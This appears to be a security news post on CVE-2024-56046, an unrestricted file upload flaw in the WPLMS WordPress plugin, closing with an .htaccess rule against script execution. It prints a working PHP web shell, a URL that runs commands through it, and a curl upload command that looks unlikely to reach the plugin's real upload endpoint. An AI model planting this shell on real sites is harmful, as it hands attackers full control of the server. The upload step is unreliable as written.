CVE CyberSecurity Database News

CVE-2024-56046 - Exploiting WPLMS Unrestricted File Upload to Deploy a Web Shell

Poster -

CVE-2024-56046 is a newly disclosed vulnerability affecting the popular WordPress plugin VibeThemes WPLMS, specifically in versions up to and including 1.9.9. This issue is critical because it allows an attacker to upload files of any type, including web shells, which can then be used to take complete control over a website.

In this post, we’ll break down what the vulnerability is, walk through step-by-step exploitation (with code snippets), and cover how to stay protected. If you’re using WPLMS, it’s time to pay attention.

What is CVE-2024-56046?

The vulnerability concerns the “Unrestricted Upload of File with Dangerous Type” in WPLMS, a Learning Management System (LMS) plugin for WordPress sites, widely used by educational websites around the world.

In plain words:
The plugin fails to properly check or block uploaded files. This means someone can upload PHP scripts (or other dangerous files) instead of just images or documents, which is a big risk.

- Affected Versions: All versions from "not available" (n/a) up to 1.9.9

Vendor: VibeThemes

- Official Reference: huntr

How Attackers Exploit CVE-2024-56046

The bug exists because WPLMS does not restrict what file types can be uploaded. Usually, file upload features check for things like .jpg or .png, but WPLMS lets *any* file through—including dangerous ones like .php.

Below is an example of a classic, simple PHP shell that an attacker may use

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
}
?>

Call this file shell.php. When uploaded, an attacker can access it via

http://targetsite.com/wp-content/uploads/shell.php?cmd=whoami

This sends the whoami command to the server, which then displays the result.

Access Your Web Shell:

After upload, visit the URL (e.g., http://targetsite.com/wp-content/uploads/shell.php) to find your shell.

Here’s how an attacker could automate the upload with curl

curl -F "file=@shell.php" https://targetsite.com/wp-content/uploads/

Note: The actual directory may differ based on site configuration.

Remote Code Execution:

Attackers can run any command on the server, including adding new users, deleting files, or installing malware.

Real World References

- huntr.dev report & PoC
- NIST NVD CVE-2024-56046
- OWASP: Unrestricted File Upload

Check existing uploads:

Review your /uploads/ directory for unexpected files (like .php scripts).

Prevent execution of scripts in the /uploads/ directory by using .htaccess rules

  # .htaccess in uploads directory
  <FilesMatch "\.(php|php5|phtml)$">
    Deny from all
  </FilesMatch>

Conclusion

CVE-2024-56046 demonstrates why *proper file upload validation* is critical in any web application. If you use WPLMS, take action now—this type of bug can lead to devastating compromises in seconds. Always keep your plugins up to date and follow secure coding standards.

Timeline

Published on: 12/31/2024 13:15:07 UTC